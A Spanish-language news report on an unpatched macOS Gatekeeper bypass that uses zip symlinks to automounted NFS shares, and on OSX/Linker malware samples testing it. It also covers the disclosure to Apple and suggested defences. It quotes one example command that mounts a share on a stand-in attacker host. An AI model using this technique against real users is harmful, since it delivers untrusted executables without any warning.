Los investigadores de ciberseguridad de Intego advierten sobre la posible explotación activa de una vulnerabilidad de seguridad sin parches en los detalles de la función de seguridad de macOS Gatekeeper de Apple y PoC para los cuales se divulgaron públicamente a fines del mes pasado.
El equipo de Intego descubrió la semana pasada cuatro muestras de nuevo malware para macOS en VirusTotal que aprovechan la vulnerabilidad de omisión de GateKeeper para ejecutar código que no es de confianza en macOS sin mostrar a los usuarios ninguna advertencia ni solicitar su permiso explícito.
Sin embargo, el malware recién descubierto, denominado OSX / Enlazador, no se ha visto en la naturaleza hasta ahora y parece estar en desarrollo. Aunque las muestras aprovechan la falla de omisión de Gatekeeper sin parches, no descarga ninguna aplicación maliciosa del servidor del atacante.
Según Joshua Long de Intego, hasta la semana pasada, el «fabricante de malware simplemente estaba realizando un reconocimiento de prueba de detección».
«Uno de los archivos se firmó con una ID de desarrollador de Apple (como se explica a continuación), es evidente que las imágenes de disco de OSX/Linker son obra de los desarrolladores del adware OSX/Surfbuyer», dijo Long en una publicación de blog.
Sin embargo, dado que la muestra de malware se vincula a un servidor remoto desde donde descarga la aplicación que no es de confianza, los atacantes también pueden distribuir las mismas muestras a objetivos reales simplemente reemplazando la aplicación de muestra definida con una aplicación de malware en su servidor.
Vulnerabilidad de omisión de Gatekeeper en macOS
GateKeeper es una función de seguridad integrada en Apple macOS que aplica la firma de código y verifica las aplicaciones descargadas antes de permitir que se ejecuten, lo que ayuda a los usuarios a proteger sus sistemas contra malware y otro software malicioso.
Eso significa que, si descarga una aplicación de Internet, GateKeeper solo permitirá que se ejecute sin advertencias si se ha firmado con un certificado válido emitido por Apple; de lo contrario, le pedirá que permita o deniegue la ejecución.
Sin embargo, Gatekeeper ha sido diseñado para tratar las unidades externas (USB o HDD) y los recursos compartidos de red como «ubicaciones seguras» desde donde los usuarios pueden ejecutar cualquier aplicación sin involucrar las comprobaciones y avisos de GateKeeper.
Filippo Cavallarin, un investigador de seguridad independiente, reveló públicamente a fines del mes pasado una forma de explotar este comportamiento combinándolo con otras dos características legítimas del sistema operativo macOS, que son:
- Los archivos zip pueden contener enlaces simbólicos que apuntan a una ubicación arbitraria, incluidos puntos finales de montaje automático, y
- La función de montaje automático en macOS puede montar automáticamente un recurso compartido de red desde un servidor remoto simplemente accediendo a él con una ruta «especial», es decir, comenzando con «/ net /».
«Por ejemplo, ls /net/evil-attacker.com/sharedfolder/ hará que el sistema operativo lea el contenido de la ‘carpeta compartida’ en el host remoto (evil-attacker.com) usando NFS», explicó Cavallarin en una publicación de blog.
Como se muestra en el video de demostración, Cavallarin creó un archivo ZIP con un enlace simbólico a un recurso compartido de red controlado por el atacante que macOS montará automáticamente.
Una vez que una víctima abre el archivo ZIP y sigue el enlace, navegará al recurso compartido de red controlado por el atacante en el que confía Gatekeeper, engañando a la víctima para que ejecute archivos ejecutables maliciosos sin previo aviso.
«La forma en que está diseñado Finder (por ejemplo, oculta las extensiones .app, oculta la ruta completa de la barra de título) hace que esta técnica sea muy efectiva y difícil de detectar», dice el investigador.
Sin embargo, las muestras de malware recién descubiertas no son archivos ZIP, sino archivos de imagen de disco (con .dmg), lo que demuestra que «los fabricantes de malware estaban experimentando para ver si la vulnerabilidad de Cavallarin también funcionaría con imágenes de disco».
Cavallarin informó responsablemente sus hallazgos a Apple el 22 de febrero, pero decidió hacerlo público a fines del mes pasado después de que la compañía no solucionó el problema dentro del plazo de divulgación de 90 días y comenzó a ignorar sus correos electrónicos.
Hasta que Apple corrija este problema, el investigador aconsejó a los administradores de red que bloqueen las comunicaciones NFS con direcciones IP externas y, para los usuarios domésticos, siempre es importante no abrir archivos adjuntos de correo electrónico de una fuente desconocida, sospechosa o no confiable.